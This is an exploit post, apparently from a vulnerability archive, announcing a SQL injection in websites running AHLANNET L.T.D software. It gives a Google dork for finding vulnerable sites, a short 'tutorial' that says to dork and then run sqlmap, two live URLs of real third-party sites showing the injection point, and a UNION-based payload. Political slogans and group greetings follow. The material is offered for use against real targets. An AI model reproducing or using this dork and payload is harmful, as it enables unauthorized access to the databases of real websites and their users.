AHLANNET L.T.D Sql İnjection Vulnerability

2017.12.19
tr Turkz.org (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################# # Exploit Title: AHLANNET L.T.D Sql İnjection Vulnerability # Author : TrazeR & Sipahiler & TurkZ.org # Google Dork : Powered By AHLANNET L.T.D # Tested on : Kali Linux 2017 Chrome, Firefox # Date : 12.19.2017 # Vendor Home: http://ahlannet.co.il/ # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ # Telegram: https://t.me/turkzgrup ################################################################################# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Open Target [+] Sqlmap And Manuel Demo: http://3hfs.com/index.php?todo=viewcat&catid=8&scatid=21' http://sarihassan.com/index.php?todo=products&cat=12&lang=pohdxrnovl' GET parameter 'cat' is vulnerable. Parameter: cat (GET) Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: todo=products&cat=-9211' UNION ALL SELECT CONCAT(0x717a6b7671,0x557a46726a6a78594350674171466e784b5a635a72745a4277786e4a477a5a4349466d6741495a6b,0x7162707071)-- kPAW&lang=pohdxrnovl FREE PALESTINE & FREE GAZA ===> İSREAL TERRORIST #KUDUS İSLAMİNDİR! Greet'Zzz : ABIKANBEY & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen

References:

http://www.trazer.org/
http://www.turkz.org/Forum/
https://t.me/turkzgrup


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top